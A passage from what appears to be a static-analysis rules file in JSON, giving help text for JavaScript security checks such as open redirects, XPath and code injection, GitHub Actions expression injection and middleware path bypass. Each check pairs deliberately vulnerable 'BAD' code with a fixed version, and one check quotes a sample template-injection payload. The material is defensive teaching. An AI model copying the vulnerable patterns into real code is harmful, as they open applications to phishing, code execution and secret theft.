require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n // BAD: a request parameter is incorporated without validation into a URL redirect\n res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: the request parameter is validated against a known fixed string\n let target = req.query[\"target\"];\n if (VALID_REDIRECT === target) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n try {\n return (\n // TODO: consider substituting your own domain for example.com\n new URL(path, \"https://example.com\").origin === \"https://example.com\"\n );\n } catch (e) {\n return false;\n }\n}\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: check that we don't redirect to a different host\n let target = req.query[\"target\"];\n if (isLocalUrl(target)) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nNote that as written, the above code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n", - "markdown" : "# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n // BAD: a request parameter is incorporated without validation into a URL redirect\n res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: the request parameter is validated against a known fixed string\n let target = req.query[\"target\"];\n if (VALID_REDIRECT === target) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n try {\n return (\n // TODO: consider substituting your own domain for example.com\n new URL(path, \"https://example.com\").origin === \"https://example.com\"\n );\n } catch (e) {\n return false;\n }\n}\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: check that we don't redirect to a different host\n let target = req.query[\"target\"];\n if (isLocalUrl(target)) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nNote that as written, the above code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-601" ], - "description" : "Server-side URL redirection based on unvalidated user input\n may cause redirection to malicious web sites.", - "id" : "js/server-side-unvalidated-url-redirection", - "kind" : "path-problem", - "name" : "Server-side URL redirect", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/client-side-unvalidated-url-redirection", - "name" : "js/client-side-unvalidated-url-redirection", - "shortDescription" : { - "text" : "Client-side URL redirect" - }, - "fullDescription" : { - "text" : "Client-side URL redirection based on unvalidated user input may cause redirection to malicious web sites." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n", - "markdown" : "# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116", "external/cwe/cwe-601" ], - "description" : "Client-side URL redirection based on unvalidated user input\n may cause redirection to malicious web sites.", - "id" : "js/client-side-unvalidated-url-redirection", - "kind" : "path-problem", - "name" : "Client-side URL redirect", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/xpath-injection", - "name" : "js/xpath-injection", - "shortDescription" : { - "text" : "XPath injection" - }, - "fullDescription" : { - "text" : "Building an XPath expression from user-controlled sources is vulnerable to insertion of malicious code by the user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // BAD: Use user-provided data directly in an XPath expression\n let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n badXPathExpr.select({\n node: root\n });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // GOOD: Embed user-provided data using variables\n let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n goodXPathExpr.select({\n node: root,\n variables: { userName: userName }\n });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: [xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n", - "markdown" : "# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // BAD: Use user-provided data directly in an XPath expression\n let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n badXPathExpr.select({\n node: root\n });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // GOOD: Embed user-provided data using variables\n let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n goodXPathExpr.select({\n node: root,\n variables: { userName: userName }\n });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: [xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-643" ], - "description" : "Building an XPath expression from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", - "id" : "js/xpath-injection", - "kind" : "path-problem", - "name" : "XPath injection", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.8" - } - }, { - "id" : "js/case-sensitive-middleware-path", - "name" : "js/case-sensitive-middleware-path", - "shortDescription" : { - "text" : "Case-sensitive middleware path" - }, - "fullDescription" : { - "text" : "Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n", - "markdown" : "# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-178" ], - "description" : "Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths.", - "id" : "js/case-sensitive-middleware-path", - "kind" : "problem", - "name" : "Case-sensitive middleware path", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.3" - } - }, { - "id" : "js/code-injection", - "name" : "js/code-injection", - "shortDescription" : { - "text" : "Code injection" - }, - "fullDescription" : { - "text" : "Interpreting unsanitized user input as code allows a malicious user arbitrary code execution." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello `+ input\n var fn = pug.compile(template);\n var html = fn();\n res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello #{username}`\n var fn = pug.compile(template);\n var html = fn({username: input});\n res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello `+ input\n var fn = pug.compile(template);\n var html = fn();\n res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello #{username}`\n var fn = pug.compile(template);\n var html = fn({username: input});\n res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-095", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Interpreting unsanitized user input as code allows a malicious user arbitrary\n code execution.", - "id" : "js/code-injection", - "kind" : "path-problem", - "name" : "Code injection", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.3" - } - }, { - "id" : "js/unsafe-dynamic-method-access", - "name" : "js/unsafe-dynamic-method-access", - "shortDescription" : { - "text" : "Unsafe dynamic method access" - }, - "fullDescription" : { - "text" : "Invoking user-controlled methods on certain objects can lead to remote code execution." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n // ...\n}\nfunction pause(data) {\n // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function \n window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n play: function(data) {\n // ...\n },\n pause: function(data) {\n // ...\n }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function\n if (!api.hasOwnProperty(message.name)) {\n return;\n }\n api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", - "markdown" : "# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n // ...\n}\nfunction pause(data) {\n // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function \n window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n play: function(data) {\n // ...\n },\n pause: function(data) {\n // ...\n }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function\n if (!api.hasOwnProperty(message.name)) {\n return;\n }\n api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-094" ], - "description" : "Invoking user-controlled methods on certain objects can lead to remote code execution.", - "id" : "js/unsafe-dynamic-method-access", - "kind" : "path-problem", - "name" : "Unsafe dynamic method access", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.3" - } - }, { - "id" : "js/actions/command-injection", - "name" : "js/actions/command-injection", - "shortDescription" : { - "text" : "Expression injection in Actions" - }, - "fullDescription" : { - "text" : "Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious user to inject code into the GitHub action." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Expression injection in Actions\nUsing user-controlled input in GitHub Actions may lead to code injection in contexts like *run:* or *script:*.\n\nCode injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository.\n\n\n## Recommendation\nThe best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not *${{ env.VAR }}*).\n\nIt is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN.\n\n\n## Example\nThe following example lets a user inject an arbitrary shell command:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - run: |\n echo '${{ github.event.comment.body }}'\n```\nThe following example uses an environment variable, but **still allows the injection** because of the use of expression syntax:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo '${{ env.BODY }}'\n```\nThe following example uses shell syntax to read the environment variable and will prevent the attack:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo \"$BODY\"\n\n```\n\n## References\n* GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input).\n* GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions).\n* GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", - "markdown" : "# Expression injection in Actions\nUsing user-controlled input in GitHub Actions may lead to code injection in contexts like *run:* or *script:*.\n\nCode injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository.\n\n\n## Recommendation\nThe best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not *${{ env.VAR }}*).\n\nIt is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN.\n\n\n## Example\nThe following example lets a user inject an arbitrary shell command:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - run: |\n echo '${{ github.event.comment.body }}'\n```\nThe following example uses an environment variable, but **still allows the injection** because of the use of expression syntax:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo '${{ env.BODY }}'\n```\nThe following example uses shell syntax to read the environment variable and will prevent the attack:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo \"$BODY\"\n\n```\n\n## References\n* GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input).\n* GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions).\n* GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" - }, - "properties" : { - "tags" : [ "actions", "security", "external/cwe/cwe-094" ], - "description" : "Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious\n user to inject code into the GitHub action.", - "id" : "js/actions/command-injection", - "kind" : "problem", - "name" : "Expression injection in Actions", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "9.3" - } - }, { - "id" : "js/bad-code-sanitization", - "name" : "js/bad-code-sanitization", - "shortDescription" : { - "text" : "Improper code sanitization" - }, - "fullDescription" : { - "text" : "Escaping code as HTML does not provide protection against code injection." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Improper code sanitization\nUsing string concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains ``, then the generated code will break out of a `` if inserted into a `` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n const assignment = `obj[${JSON.stringify(key)}]=42`;\n return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n '<': '\\\\u003C',\n '>' : '\\\\u003E',\n '/': '\\\\u002F',\n '\\\\': '\\\\\\\\',\n '\\b': '\\\\b',\n '\\f': '\\\\f',\n '\\n': '\\\\n',\n 